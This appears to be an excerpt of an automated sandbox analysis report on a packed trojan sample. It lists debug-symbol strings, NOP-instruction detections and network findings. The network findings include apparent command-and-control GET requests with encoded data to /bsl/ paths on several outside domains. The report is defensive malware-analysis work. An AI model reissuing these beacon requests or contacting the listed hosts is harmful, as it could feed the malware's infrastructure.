Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cdp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdba source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: InputHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdbmS< source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntshrui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: coml2.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: drprov.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: IdStore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdbSP source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.722744884.0000000001290000.00000040.00000001.sdmp, mstsc.exe, 00000006.00000002.1032811979.0000000004750000.00000040.00000001.sdmp
Source: Binary string: Windows.Shell.BlueLightReduction.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: TaskFlowDataEngine.pdbeS4 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdbb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: davhlpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Deviceovs.pdb source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: EhStorShell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: XmlLite.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: WorkFoldersShell.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: batmeter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cscui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DWrite.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MFPLAT.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SyncCenter.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb=SL source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdbv source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbh source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000A.00000003.726046312.000001EDC6DF6000.00000004.00000001.sdmp
Source: Binary string: Bcp47Langs.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: rtworkq.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdbASh source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: rpcrt4.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdbES source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: explorer.pdb source: WerFault.exe, 0000000A.00000003.725996524.000001EDC6DEA000.00000004.00000001.sdmp
Source: Binary string: twinui.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: NPSMDesktopProvider.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: MMDevAPI.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Immersive.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: capauthz.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: hcproviders.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Wer.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: user32.pdb0 source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: wincorlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntlanman.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: IEProxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: devobj.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: policymanager.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WPDShServiceObj.pdb&uX source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: RmClient.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StructuredQuery.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UserMgrProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d2d1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: PhotoMetadataHandler.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ES.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdb2R source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb-S| source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdbm source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.ImmersiveShell.ServiceProvider.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: framedynos.pdbt8 source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb?jO source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: staterepository.core.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: npmproxy.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msxml6.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb9S@ source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cryptngc.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: UIAnimation.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: DXP.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 0000000A.00000003.729628969.000001EDC6F2D000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_04AB7498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB6758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB83F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov esp, ebp 0_2_04ABDEF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then jmp 04AB276Eh 0_2_04AB1F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB9481
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_04AB7495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_04AB716C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB716C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_04AB7178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_04AB7178
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then xor edx, edx 0_2_04AB73CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then xor edx, edx 0_2_04AB73D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_04AB6C9D

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1Host: www.g2vies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1Host: www.edu4go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.102.136.180 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: global traffic HTTP traffic detected: GET /bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi HTTP/1.1Host: www.g2vies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP HTTP/1.1Host: www.edu4go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: SearchUI.exe, 00000016.00000003.839516541.000001B8D2042000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.@ equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: www.thesunchronical.com
Source: explorer.exe, 00000010.00000003.836779593.00000000062E8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: SearchUI.exe, 00000016.00000002.914254001.000001B8D1BAF000.00000004.00000001.sdmp String found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.682654205.00000000082B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000003.668183280.00000000082A1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobj
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683370070.00000000024CF000.00000004.00000001.sdmp String found in binary or memory: http://schema.org/WebPage
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000002.751926871.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.com/bsl/www.luohu666.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.cbothwelltest2020081703.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.com/bsl/www.infomgt.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.edu4go.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.com/bsl/www.furnacerepairtacoma.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.estivalconsultancy.comReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.net/bsl/www.listenmelody.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.furnacerepairtacoma.netReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.com/bsl/www.edu4go.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.g2vies.comReferer:
